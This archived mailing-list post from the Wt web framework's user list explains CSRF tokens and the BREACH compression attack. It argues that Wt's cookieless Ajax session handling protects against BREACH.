Hey Chris, 2013/8/19 Chris Frey <cdf...@foursquare.net>: > On Mon, Aug 19, 2013 at 09:57:14PM +0200, Koen Deforche wrote: >> Since we do not rely on cookies, there is no need for CSRF tokens. The >> BREACH attack doesn't really mention very well, IMHO, that it relies >> on cookies for session tracking in the first place since that's the >> starting point to trying to guess a secret in the page by generating >> requests from the user's browser. > > Thanks very much for your reply! > > Yes, that makes more sense. If I understand correctly, the entire attack > relies on: > > - the CSRF is given to the server via cookie automatically
CSRF = Cross Site Request Forgery; that's already an attack. CSRF attacks a target site from the user's browser (that is also visiting the attacker's site) by abusing the cookie that is used to trust requests from the browser and thus generate malicious requests from within the user's browser to the site under attack. The CSRF token is the primary defense for this attack since it puts a token in the response that must be included in "sensitive" requests in the form submitted from client to server (i.e. requests that modify data, POST), however GET requests are usually not protected and provide this CSRF token in their body. This, together with user-modifiable output in the response of the GET request, is the basis for BREACH, or at least in the scenario that they are after your CSRF token. But they can also attempt to obtain other interesting information such as name, bank account number, etc which is in the GET body. > In Wt's case, there is generally no cookie value at all, and if the > attacker guesses a different ID via URL, then it just starts a new > session and that new ID comes back in the HTML. > > Is that close? That's close. It's even the case that Wt will ignore the session ID (or refuse the request, I forget now what we actually do) if you would put it in a URL for a page refresh. This is a second defense in Wt to make a stolen session ID even useless. Again this all under the assumption of an Ajax session. Regards, koen ------------------------------------------------------------------------------ Introducing Performance Central, a new site from SourceForge and AppDynamics. Performance Central is your source for news, insights, analysis and resources for efficient Application Performance Management. Visit us today! http://pubads.g.doubleclick.net/gampad/clk?id=48897511&iu=/4140/ostg.clktrk _______________________________________________ witty-interest mailing list witty-interest@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/witty-interest
